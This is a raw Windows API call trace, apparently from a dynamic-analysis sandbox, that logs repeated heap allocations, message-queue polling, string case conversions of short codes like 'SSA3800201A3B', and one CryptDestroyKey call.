0x34aa328 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.336] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.336] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.337] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.337] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.337] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.337] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.337] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.337] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.337] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.337] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.338] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.338] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.338] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.338] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.338] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.338] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.338] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.339] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.339] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.461] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.461] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.462] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0165.462] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.462] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0165.462] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.462] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.462] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.462] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.463] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.463] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.463] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.463] CryptDestroyKey (hKey=0xaa55e0) returned 1 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.464] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.464] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.464] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.464] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.464] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.464] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.464] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.464] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.465] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.465] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.465] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.465] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.465] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.465] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.465] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.465] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.466] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.466] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.466] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.466] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.466] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.466] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.467] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.467] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.467] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.467] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.468] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.468] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.468] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.468] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb 